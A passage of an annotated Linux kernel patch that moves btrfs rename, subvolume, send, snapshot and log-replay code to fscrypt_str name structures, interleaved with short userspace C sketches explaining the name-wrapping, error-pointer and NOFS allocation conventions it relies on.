+-			     new_dentry->d_name.len, 0, old_idx);
++			     new_name, 0, old_idx);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(old_dir), BTRFS_I(new_inode),
+-			     old_dentry->d_name.name,
+-			     old_dentry->d_name.len, 0, new_idx);
++			     old_name, 0, new_idx);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+@@ -9250,6 +9307,8 @@ out_notrans:
+ 	    old_ino == BTRFS_FIRST_FREE_OBJECTID)
+ 		up_read(&fs_info->subvol_sem);
+ 
++	fscrypt_free_filename(&new_fname);
++	fscrypt_free_filename(&old_fname);
+ 	return ret;
+ }
+ 
+@@ -9289,6 +9348,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	int ret;
+ 	int ret2;
+ 	u64 old_ino = btrfs_ino(BTRFS_I(old_inode));
++	struct fscrypt_name old_fname, new_fname;
+ 
+ 	if (btrfs_ino(BTRFS_I(new_dir)) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID)
+ 		return -EPERM;
+@@ -9305,22 +9365,28 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	    new_inode->i_size > BTRFS_EMPTY_DIR_SIZE)
+ 		return -ENOTEMPTY;
+ 
++	ret = fscrypt_setup_filename(old_dir, &old_dentry->d_name, 0, &old_fname);
++	if (ret)
++		return ret;
+ 
+-	/* check for collisions, even if the  name isn't there */
+-	ret = btrfs_check_dir_item_collision(dest, new_dir->i_ino,
+-			     new_dentry->d_name.name,
+-			     new_dentry->d_name.len);
++	ret = fscrypt_setup_filename(new_dir, &new_dentry->d_name, 0, &new_fname);
++	if (ret) {
++		fscrypt_free_filename(&old_fname);
++		return ret;
++	}
+ 
++	/* check for collisions, even if the  name isn't there */
++	ret = btrfs_check_dir_item_collision(dest, new_dir->i_ino, &new_fname.disk_name);
+ 	if (ret) {
+ 		if (ret == -EEXIST) {
+ 			/* we shouldn't get
+ 			 * eexist without a new_inode */
+ 			if (WARN_ON(!new_inode)) {
+-				return ret;
++				goto out_fscrypt_names;
+ 			}
+ 		} else {
+ 			/* maybe -EOVERFLOW */
+-			return ret;
++			goto out_fscrypt_names;
+ 		}
+ 	}
+ 	ret = 0;
+@@ -9334,8 +9400,10 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 
+ 	if (flags & RENAME_WHITEOUT) {
+ 		whiteout_args.inode = new_whiteout_inode(mnt_userns, old_dir);
+-		if (!whiteout_args.inode)
+-			return -ENOMEM;
++		if (!whiteout_args.inode) {
++			ret = -ENOMEM;
++			goto out_fscrypt_names;
++		}
+ 		ret = btrfs_new_inode_prepare(&whiteout_args, &trans_num_items);
+ 		if (ret)
+ 			goto out_whiteout_inode;
+@@ -9403,11 +9471,9 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, dest,
+-					     new_dentry->d_name.name,
+-					     new_dentry->d_name.len,
+-					     old_ino,
+-					     btrfs_ino(BTRFS_I(new_dir)), index);
++		ret = btrfs_insert_inode_ref(trans, dest, &new_fname.disk_name,
++					     old_ino, btrfs_ino(BTRFS_I(new_dir)),
++					     index);
+ 		if (ret)
+ 			goto out_fail;
+ 	}
+@@ -9429,10 +9495,8 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		ret = btrfs_unlink_subvol(trans, old_dir, old_dentry);
+ 	} else {
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(old_dir),
+-					BTRFS_I(d_inode(old_dentry)),
+-					old_dentry->d_name.name,
+-					old_dentry->d_name.len,
+-					&rename_ctx);
++					   BTRFS_I(d_inode(old_dentry)),
++					   &old_fname.disk_name, &rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, root, BTRFS_I(old_inode));
+ 	}
+@@ -9451,8 +9515,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		} else {
+ 			ret = btrfs_unlink_inode(trans, BTRFS_I(new_dir),
+ 						 BTRFS_I(d_inode(new_dentry)),
+-						 new_dentry->d_name.name,
+-						 new_dentry->d_name.len);
++						 &new_fname.disk_name);
+ 		}
+ 		if (!ret && new_inode->i_nlink == 0)
+ 			ret = btrfs_orphan_add(trans,
+@@ -9464,8 +9527,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(new_dir), BTRFS_I(old_inode),
+-			     new_dentry->d_name.name,
+-			     new_dentry->d_name.len, 0, index);
++			     &new_fname.disk_name, 0, index);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+@@ -9500,6 +9562,9 @@ out_notrans:
+ out_whiteout_inode:
+ 	if (flags & RENAME_WHITEOUT)
+ 		iput(whiteout_args.inode);
++out_fscrypt_names:
++	fscrypt_free_filename(&old_fname);
++	fscrypt_free_filename(&new_fname);
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 2e29fafe0e7d9..9e323420c96d3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -951,6 +951,7 @@ static noinline int btrfs_mksubvol(const struct path *parent,
+ 	struct inode *dir = d_inode(parent->dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(dir->i_sb);
+ 	struct dentry *dentry;
++	struct fscrypt_str name_str = FSTR_INIT((char *)name, namelen);
+ 	int error;
+ 
+ 	error = down_write_killable_nested(&dir->i_rwsem, I_MUTEX_PARENT);
+@@ -971,8 +972,7 @@ static noinline int btrfs_mksubvol(const struct path *parent,
+ 	 * check for them now when we can safely fail
+ 	 */
+ 	error = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
+-					       dir->i_ino, name,
+-					       namelen);
++					       dir->i_ino, &name_str);
+ 	if (error)
+ 		goto out_dput;
+ 
+@@ -3782,6 +3782,7 @@ static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_path *path = NULL;
+ 	struct btrfs_disk_key disk_key;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 objectid = 0;
+ 	u64 dir_id;
+ 	int ret;
+@@ -3825,7 +3826,7 @@ static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
+ 
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+ 	di = btrfs_lookup_dir_item(trans, fs_info->tree_root, path,
+-				   dir_id, "default", 7, 1);
++				   dir_id, &name, 1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		btrfs_release_path(path);
+ 		btrfs_end_transaction(trans);
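
FSTR_INIT() in btrfs_mksubvol() wraps the caller's existing buffer rather
than copying it; the (char *) cast is needed only because fscrypt_str's
name member is not const-qualified, and len counts bytes with no trailing
NUL (hence 7 for "default"). A sketch of that borrowed-buffer wrapping
under the same simplified stand-ins as above:

#include <stdio.h>
#include <string.h>

struct fscrypt_str {
	char *name;
	unsigned int len;
};
#define FSTR_INIT(n, l)	{ .name = (n), .len = (l) }

/* New-style consumer, as in btrfs_check_dir_item_collision(). */
static void check_name(const struct fscrypt_str *name)
{
	printf("checking %u bytes: %.*s\n",
	       name->len, (int)name->len, name->name);
}

int main(void)
{
	const char *name = "subvol";
	int namelen = (int)strlen(name);
	/* Wrap the caller's buffer without copying; the cast mirrors the
	 * (char *)name in btrfs_mksubvol(). */
	struct fscrypt_str name_str = FSTR_INIT((char *)name, namelen);

	check_name(&name_str);
	return 0;
}
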
+diff --git a/fs/btrfs/root-tree.c b/fs/btrfs/root-tree.c
+index e1f599d7a9164..7d783f0943068 100644
+--- a/fs/btrfs/root-tree.c
++++ b/fs/btrfs/root-tree.c
+@@ -327,9 +327,8 @@ out:
+ }
+ 
+ int btrfs_del_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 *sequence, const char *name,
+-		       int name_len)
+-
++		       u64 ref_id, u64 dirid, u64 *sequence,
++		       const struct fscrypt_str *name)
+ {
+ 	struct btrfs_root *tree_root = trans->fs_info->tree_root;
+ 	struct btrfs_path *path;
+@@ -356,8 +355,8 @@ again:
+ 				     struct btrfs_root_ref);
+ 		ptr = (unsigned long)(ref + 1);
+ 		if ((btrfs_root_ref_dirid(leaf, ref) != dirid) ||
+-		    (btrfs_root_ref_name_len(leaf, ref) != name_len) ||
+-		    memcmp_extent_buffer(leaf, name, ptr, name_len)) {
++		    (btrfs_root_ref_name_len(leaf, ref) != name->len) ||
++		    memcmp_extent_buffer(leaf, name->name, ptr, name->len)) {
+ 			ret = -ENOENT;
+ 			goto out;
+ 		}
+@@ -400,8 +399,8 @@ out:
+  * Will return 0, -ENOMEM, or anything from the CoW path
+  */
+ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 sequence, const char *name,
+-		       int name_len)
++		       u64 ref_id, u64 dirid, u64 sequence,
++		       const struct fscrypt_str *name)
+ {
+ 	struct btrfs_root *tree_root = trans->fs_info->tree_root;
+ 	struct btrfs_key key;
+@@ -420,7 +419,7 @@ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+ 	key.offset = ref_id;
+ again:
+ 	ret = btrfs_insert_empty_item(trans, tree_root, path, &key,
+-				      sizeof(*ref) + name_len);
++				      sizeof(*ref) + name->len);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		btrfs_free_path(path);
+@@ -431,9 +430,9 @@ again:
+ 	ref = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_root_ref);
+ 	btrfs_set_root_ref_dirid(leaf, ref, dirid);
+ 	btrfs_set_root_ref_sequence(leaf, ref, sequence);
+-	btrfs_set_root_ref_name_len(leaf, ref, name_len);
++	btrfs_set_root_ref_name_len(leaf, ref, name->len);
+ 	ptr = (unsigned long)(ref + 1);
+-	write_extent_buffer(leaf, name, ptr, name_len);
++	write_extent_buffer(leaf, name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(leaf);
+ 
+ 	if (key.type == BTRFS_ROOT_BACKREF_KEY) {
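
The root-ref match in btrfs_del_root_ref() compares the stored name
length before the bytes, since memcmp over name->len bytes alone would
accept a longer on-disk name that merely shares a prefix. A toy model of
that length-then-bytes match against an inline, non-NUL-terminated name:

#include <stdio.h>
#include <string.h>

struct fscrypt_str {
	const char *name;
	unsigned int len;
};

/* Toy analogue of a btrfs_root_ref: an on-disk ref stores a length
 * plus inline name bytes, so compare the length first and only then
 * the bytes. */
struct root_ref {
	unsigned int name_len;
	char name[16];		/* inline, not NUL-terminated */
};

static int ref_matches(const struct root_ref *ref,
		       const struct fscrypt_str *name)
{
	return ref->name_len == name->len &&
	       memcmp(ref->name, name->name, name->len) == 0;
}

int main(void)
{
	struct root_ref ref = { 4, "snap" };
	struct fscrypt_str full = { "snap", 4 };
	struct fscrypt_str prefix = { "sna", 3 };

	printf("full=%d prefix=%d\n",
	       ref_matches(&ref, &full), ref_matches(&ref, &prefix));
	return 0;
}
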
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 35e889fe2a95d..547b5c2292186 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1596,13 +1596,17 @@ static int gen_unique_name(struct send_ctx *sctx,
+ 		return -ENOMEM;
+ 
+ 	while (1) {
++		struct fscrypt_str tmp_name;
++
+ 		len = snprintf(tmp, sizeof(tmp), "o%llu-%llu-%llu",
+ 				ino, gen, idx);
+ 		ASSERT(len < sizeof(tmp));
++		tmp_name.name = tmp;
++		tmp_name.len = strlen(tmp);
+ 
+ 		di = btrfs_lookup_dir_item(NULL, sctx->send_root,
+ 				path, BTRFS_FIRST_FREE_OBJECTID,
+-				tmp, strlen(tmp), 0);
++				&tmp_name, 0);
+ 		btrfs_release_path(path);
+ 		if (IS_ERR(di)) {
+ 			ret = PTR_ERR(di);
+@@ -1622,7 +1626,7 @@ static int gen_unique_name(struct send_ctx *sctx,
+ 
+ 		di = btrfs_lookup_dir_item(NULL, sctx->parent_root,
+ 				path, BTRFS_FIRST_FREE_OBJECTID,
+-				tmp, strlen(tmp), 0);
++				&tmp_name, 0);
+ 		btrfs_release_path(path);
+ 		if (IS_ERR(di)) {
+ 			ret = PTR_ERR(di);
+@@ -1752,13 +1756,13 @@ static int lookup_dir_item_inode(struct btrfs_root *root,
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+ 	struct btrfs_path *path;
++	struct fscrypt_str name_str = FSTR_INIT((char *)name, name_len);
+ 
+ 	path = alloc_path_for_send();
+ 	if (!path)
+ 		return -ENOMEM;
+ 
+-	di = btrfs_lookup_dir_item(NULL, root, path,
+-			dir, name, name_len, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dir, &name_str, 0);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
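
gen_unique_name() builds the candidate name with snprintf() into a stack
buffer and only then wraps it in a stack-local fscrypt_str;
tmp_name.len = strlen(tmp) matches the length snprintf() reported, as
both exclude the terminating NUL. A minimal sketch of that wrap:

#include <stdio.h>
#include <string.h>

struct fscrypt_str {
	char *name;
	unsigned int len;
};

int main(void)
{
	char tmp[64];
	struct fscrypt_str tmp_name;
	unsigned long long ino = 257, gen = 5, idx = 0;

	/* Build the orphan-style name in a stack buffer, then wrap it. */
	int len = snprintf(tmp, sizeof(tmp), "o%llu-%llu-%llu", ino, gen, idx);

	tmp_name.name = tmp;
	tmp_name.len = strlen(tmp);	/* equals snprintf()'s return here */

	printf("len=%d name=%.*s\n", len, (int)tmp_name.len, tmp_name.name);
	return 0;
}
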
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 582b71b7fa779..2c562febd801e 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1398,6 +1398,7 @@ static int get_default_subvol_objectid(struct btrfs_fs_info *fs_info, u64 *objec
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_path *path;
+ 	struct btrfs_key location;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 dir_id;
+ 
+ 	path = btrfs_alloc_path();
+@@ -1410,7 +1411,7 @@ static int get_default_subvol_objectid(struct btrfs_fs_info *fs_info, u64 *objec
+ 	 * to mount.
+ 	 */
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+-	di = btrfs_lookup_dir_item(NULL, root, path, dir_id, "default", 7, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dir_id, &name, 0);
+ 	if (IS_ERR(di)) {
+ 		btrfs_free_path(path);
+ 		return PTR_ERR(di);
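
Several hunks here triage btrfs_lookup_dir_item()'s three-way return: an
ERR_PTR()-encoded errno, NULL for "not found", or a valid item
(IS_ERR_OR_NULL() collapses the first two). A userspace model of the
convention, assuming simplified versions of the helpers from
include/linux/err.h:

#include <stdio.h>

/* Userspace model of the kernel's error-pointer convention: an error
 * pointer encodes -errno in the top of the address space, NULL means
 * "not found", and any other value is a valid item. */
#define MAX_ERRNO	4095

static inline void *ERR_PTR(long error)
{
	return (void *)error;
}

static inline long PTR_ERR(const void *ptr)
{
	return (long)ptr;
}

static inline int IS_ERR(const void *ptr)
{
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

static void triage(void *di)
{
	if (IS_ERR(di))
		printf("hard error %ld\n", PTR_ERR(di));
	else if (!di)
		printf("not found\n");
	else
		printf("found item at %p\n", di);
}

int main(void)
{
	int item = 0;

	triage(&item);		/* found */
	triage(NULL);		/* not found */
	triage(ERR_PTR(-5));	/* -EIO-style hard error */
	return 0;
}
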
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index a555567594418..1193214ba8c10 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -6,6 +6,7 @@
+ #include <linux/fs.h>
+ #include <linux/slab.h>
+ #include <linux/sched.h>
++#include <linux/sched/mm.h>
+ #include <linux/writeback.h>
+ #include <linux/pagemap.h>
+ #include <linux/blkdev.h>
+@@ -1627,10 +1628,9 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	struct btrfs_root *root = pending->root;
+ 	struct btrfs_root *parent_root;
+ 	struct btrfs_block_rsv *rsv;
+-	struct inode *parent_inode;
++	struct inode *parent_inode = pending->dir;
+ 	struct btrfs_path *path;
+ 	struct btrfs_dir_item *dir_item;
+-	struct dentry *dentry;
+ 	struct extent_buffer *tmp;
+ 	struct extent_buffer *old;
+ 	struct timespec64 cur_time;
+@@ -1639,6 +1639,8 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	u64 index = 0;
+ 	u64 objectid;
+ 	u64 root_flags;
++	unsigned int nofs_flags;
++	struct fscrypt_name fname;
+ 
+ 	ASSERT(pending->path);
+ 	path = pending->path;
+@@ -1646,9 +1648,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	ASSERT(pending->root_item);
+ 	new_root_item = pending->root_item;
+ 
++	/*
++	 * We're inside a transaction and must make sure that any potential
++	 * allocations with GFP_KERNEL in fscrypt won't recurse back into
++	 * the filesystem.
++	 */
++	nofs_flags = memalloc_nofs_save();
++	pending->error = fscrypt_setup_filename(parent_inode,
++						&pending->dentry->d_name, 0,
++						&fname);
++	memalloc_nofs_restore(nofs_flags);
++	if (pending->error)
++		goto free_pending;
++
+ 	pending->error = btrfs_get_free_objectid(tree_root, &objectid);
+ 	if (pending->error)
+-		goto no_free_objectid;
++		goto free_fname;
+ 
+ 	/*
+ 	 * Make qgroup to skip current new snapshot's qgroupid, as it is
+@@ -1677,8 +1692,6 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	trace_btrfs_space_reservation(fs_info, "transaction",
+ 				      trans->transid,
+ 				      trans->bytes_reserved, 1);
+-	dentry = pending->dentry;
+-	parent_inode = pending->dir;
+ 	parent_root = BTRFS_I(parent_inode)->root;
+ 	ret = record_root_in_trans(trans, parent_root, 0);
+ 	if (ret)
+@@ -1694,8 +1707,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	/* check if there is a file/dir which has the same name. */
+ 	dir_item = btrfs_lookup_dir_item(NULL, parent_root, path,
+ 					 btrfs_ino(BTRFS_I(parent_inode)),
+-					 dentry->d_name.name,
+-					 dentry->d_name.len, 0);
++					 &fname.disk_name, 0);
+ 	if (dir_item != NULL && !IS_ERR(dir_item)) {
+ 		pending->error = -EEXIST;
+ 		goto dir_item_existed;
+@@ -1790,7 +1802,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	ret = btrfs_add_root_ref(trans, objectid,
+ 				 parent_root->root_key.objectid,
+ 				 btrfs_ino(BTRFS_I(parent_inode)), index,
+-				 dentry->d_name.name, dentry->d_name.len);
++				 &fname.disk_name);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto fail;
+@@ -1822,9 +1834,9 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	if (ret < 0)
+ 		goto fail;
+ 
+-	ret = btrfs_insert_dir_item(trans, dentry->d_name.name,
+-				    dentry->d_name.len, BTRFS_I(parent_inode),
+-				    &key, BTRFS_FT_DIR, index);
++	ret = btrfs_insert_dir_item(trans, &fname.disk_name,
++				    BTRFS_I(parent_inode), &key, BTRFS_FT_DIR,
++				    index);
+ 	/* We have checked the name at the beginning, so it is impossible. */
+ 	BUG_ON(ret == -EEXIST || ret == -EOVERFLOW);
+ 	if (ret) {
+@@ -1833,7 +1845,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	btrfs_i_size_write(BTRFS_I(parent_inode), parent_inode->i_size +
+-					 dentry->d_name.len * 2);
++						  fname.disk_name.len * 2);
+ 	parent_inode->i_mtime = current_time(parent_inode);
+ 	parent_inode->i_ctime = parent_inode->i_mtime;
+ 	ret = btrfs_update_inode_fallback(trans, parent_root, BTRFS_I(parent_inode));
+@@ -1865,7 +1877,9 @@ dir_item_existed:
+ 	trans->bytes_reserved = 0;
+ clear_skip_qgroup:
+ 	btrfs_clear_skip_qgroup(trans);
+-no_free_objectid:
++free_fname:
++	fscrypt_free_filename(&fname);
++free_pending:
+ 	kfree(new_root_item);
+ 	pending->root_item = NULL;
+ 	btrfs_free_path(path);
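
create_pending_snapshot() brackets fscrypt_setup_filename() with
memalloc_nofs_save()/memalloc_nofs_restore() because it runs inside a
transaction: any GFP_KERNEL allocation fscrypt makes could otherwise
trigger reclaim that re-enters the filesystem and deadlocks. A userspace
model of that scoped-flag mechanism; the real helpers live in
include/linux/sched/mm.h and act on current->flags:

#include <stdio.h>

/* Userspace model of memalloc_nofs_save()/restore(): a thread-local
 * scope flag that allocation helpers consult, so GFP_KERNEL requests
 * inside the scope are implicitly degraded to GFP_NOFS. */
static _Thread_local unsigned int pflags;
#define PF_MEMALLOC_NOFS 0x1

static unsigned int memalloc_nofs_save(void)
{
	unsigned int old = pflags;

	pflags |= PF_MEMALLOC_NOFS;
	return old;
}

static void memalloc_nofs_restore(unsigned int old)
{
	pflags = old;
}

static const char *current_gfp(void)
{
	return (pflags & PF_MEMALLOC_NOFS) ? "GFP_NOFS" : "GFP_KERNEL";
}

int main(void)
{
	unsigned int flags;

	printf("before: %s\n", current_gfp());
	flags = memalloc_nofs_save();
	printf("inside: %s\n", current_gfp());	/* fscrypt allocs land here */
	memalloc_nofs_restore(flags);
	printf("after:  %s\n", current_gfp());
	return 0;
}
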
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 00be69ce7b90f..c03ff6a5a7f6b 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -595,6 +595,21 @@ static int overwrite_item(struct btrfs_trans_handle *trans,
+ 	return do_overwrite_item(trans, root, path, eb, slot, key);
+ }
+ 
++static int read_alloc_one_name(struct extent_buffer *eb, void *start, int len,
++			       struct fscrypt_str *name)
++{
++	char *buf;
++
++	buf = kmalloc(len, GFP_NOFS);
++	if (!buf)
++		return -ENOMEM;
++
++	read_extent_buffer(eb, buf, (unsigned long)start, len);
++	name->name = buf;
++	name->len = len;
++	return 0;
++}
++
+ /*
+  * simple helper to read an inode off the disk from a given root
+  * This can only be called for subvolume roots and not for the log
+@@ -901,12 +916,11 @@ out:
+ static int unlink_inode_for_log_replay(struct btrfs_trans_handle *trans,
+ 				       struct btrfs_inode *dir,
+ 				       struct btrfs_inode *inode,
+-				       const char *name,
+-				       int name_len)
++				       const struct fscrypt_str *name)
+ {
+ 	int ret;
+ 
+-	ret = btrfs_unlink_inode(trans, dir, inode, name, name_len);
++	ret = btrfs_unlink_inode(trans, dir, inode, name);
+ 	if (ret)
+ 		return ret;
+ 	/*
+@@ -933,8 +947,7 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ {
+ 	struct btrfs_root *root = dir->root;
+ 	struct inode *inode;
+-	char *name;
+-	int name_len;
++	struct fscrypt_str name;
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_key location;
+ 	int ret;
+@@ -942,12 +955,10 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ 	leaf = path->nodes[0];
+ 
+ 	btrfs_dir_item_key_to_cpu(leaf, di, &location);
+-	name_len = btrfs_dir_name_len(leaf, di);
+-	name = kmalloc(name_len, GFP_NOFS);
+-	if (!name)
++	ret = read_alloc_one_name(leaf, di + 1, btrfs_dir_name_len(leaf, di), &name);
++	if (ret)
+ 		return -ENOMEM;
+ 
+-	read_extent_buffer(leaf, name, (unsigned long)(di + 1), name_len);
+ 	btrfs_release_path(path);
+ 
+ 	inode = read_one_inode(root, location.objectid);
+@@ -960,10 +971,9 @@ static noinline int drop_one_dir_item(struct btrfs_trans_handle *trans,
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = unlink_inode_for_log_replay(trans, dir, BTRFS_I(inode), name,
+-			name_len);
++	ret = unlink_inode_for_log_replay(trans, dir, BTRFS_I(inode), &name);
+ out:
+-	kfree(name);
++	kfree(name.name);
+ 	iput(inode);
+ 	return ret;
+ }
+@@ -978,14 +988,14 @@ out:
+ static noinline int inode_in_dir(struct btrfs_root *root,
+ 				 struct btrfs_path *path,
+ 				 u64 dirid, u64 objectid, u64 index,
+-				 const char *name, int name_len)
++				 struct fscrypt_str *name)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key location;
+ 	int ret = 0;
+ 
+ 	di = btrfs_lookup_dir_index_item(NULL, root, path, dirid,
+-					 index, name, name_len, 0);
++					 index, name, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		goto out;
+@@ -998,7 +1008,7 @@ static noinline int inode_in_dir(struct btrfs_root *root,
+ 	}
+ 
+ 	btrfs_release_path(path);
+-	di = btrfs_lookup_dir_item(NULL, root, path, dirid, name, name_len, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dirid, name, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		goto out;
+@@ -1025,7 +1035,7 @@ out:
+ static noinline int backref_in_log(struct btrfs_root *log,
+ 				   struct btrfs_key *key,
+ 				   u64 ref_objectid,
+-				   const char *name, int namelen)
++				   const struct fscrypt_str *name)
+ {
+ 	struct btrfs_path *path;
+ 	int ret;
+@@ -1045,12 +1055,10 @@ static noinline int backref_in_log(struct btrfs_root *log,
+ 	if (key->type == BTRFS_INODE_EXTREF_KEY)
+ 		ret = !!btrfs_find_name_in_ext_backref(path->nodes[0],
+ 						       path->slots[0],
+-						       ref_objectid,
+-						       name, namelen);
++						       ref_objectid, name);
+ 	else
+ 		ret = !!btrfs_find_name_in_backref(path->nodes[0],
+-						   path->slots[0],
+-						   name, namelen);
++						   path->slots[0], name);
+ out:
+ 	btrfs_free_path(path);
+ 	return ret;
+@@ -1063,11 +1071,9 @@ static inline int __add_inode_ref(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_inode *dir,
+ 				  struct btrfs_inode *inode,
+ 				  u64 inode_objectid, u64 parent_objectid,
+-				  u64 ref_index, char *name, int namelen)
++				  u64 ref_index, struct fscrypt_str *name)
+ {
+ 	int ret;
+-	char *victim_name;
+-	int victim_name_len;
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key search_key;
+@@ -1099,43 +1105,40 @@ again:
+ 		ptr = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 		ptr_end = ptr + btrfs_item_size(leaf, path->slots[0]);
+ 		while (ptr < ptr_end) {
+-			victim_ref = (struct btrfs_inode_ref *)ptr;
+-			victim_name_len = btrfs_inode_ref_name_len(leaf,
+-								   victim_ref);
+-			victim_name = kmalloc(victim_name_len, GFP_NOFS);
+-			if (!victim_name)
+-				return -ENOMEM;
++			struct fscrypt_str victim_name;
+ 
+-			read_extent_buffer(leaf, victim_name,
+-					   (unsigned long)(victim_ref + 1),
+-					   victim_name_len);
++			victim_ref = (struct btrfs_inode_ref *)ptr;
++			ret = read_alloc_one_name(leaf, (victim_ref + 1),
++				 btrfs_inode_ref_name_len(leaf, victim_ref),
++				 &victim_name);
++			if (ret)
++				return ret;
+ 
+ 			ret = backref_in_log(log_root, &search_key,
+-					     parent_objectid, victim_name,
+-					     victim_name_len);
++					     parent_objectid, &victim_name);
+ 			if (ret < 0) {
+-				kfree(victim_name);
++				kfree(victim_name.name);
+ 				return ret;
+ 			} else if (!ret) {
+ 				inc_nlink(&inode->vfs_inode);
+ 				btrfs_release_path(path);
+ 
+ 				ret = unlink_inode_for_log_replay(trans, dir, inode,
+-						victim_name, victim_name_len);
+-				kfree(victim_name);
++						&victim_name);
++				kfree(victim_name.name);
+ 				if (ret)
+ 					return ret;
+ 				goto again;
+ 			}
+-			kfree(victim_name);
++			kfree(victim_name.name);
+ 
+-			ptr = (unsigned long)(victim_ref + 1) + victim_name_len;
++			ptr = (unsigned long)(victim_ref + 1) + victim_name.len;
+ 		}
+ 	}
+ 	btrfs_release_path(path);
+ 
+ 	/* Same search but for extended refs */
+-	extref = btrfs_lookup_inode_extref(NULL, root, path, name, namelen,
++	extref = btrfs_lookup_inode_extref(NULL, root, path, name,
+ 					   inode_objectid, parent_objectid, 0,
+ 					   0);
+ 	if (IS_ERR(extref)) {
+@@ -1152,29 +1155,28 @@ again:
+ 		base = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 
+ 		while (cur_offset < item_size) {
+-			extref = (struct btrfs_inode_extref *)(base + cur_offset);
++			struct fscrypt_str victim_name;
+ 
+-			victim_name_len = btrfs_inode_extref_name_len(leaf, extref);
++			extref = (struct btrfs_inode_extref *)(base + cur_offset);
+ 
+ 			if (btrfs_inode_extref_parent(leaf, extref) != parent_objectid)
+ 				goto next;
+ 
+-			victim_name = kmalloc(victim_name_len, GFP_NOFS);
+-			if (!victim_name)
+-				return -ENOMEM;
+-			read_extent_buffer(leaf, victim_name, (unsigned long)&extref->name,
+-					   victim_name_len);
++			ret = read_alloc_one_name(leaf, &extref->name,
++				 btrfs_inode_extref_name_len(leaf, extref),
++				 &victim_name);
++			if (ret)
++				return ret;
+ 
+ 			search_key.objectid = inode_objectid;
+ 			search_key.type = BTRFS_INODE_EXTREF_KEY;
+ 			search_key.offset = btrfs_extref_hash(parent_objectid,
+-							      victim_name,
+-							      victim_name_len);
++							      victim_name.name,
++							      victim_name.len);
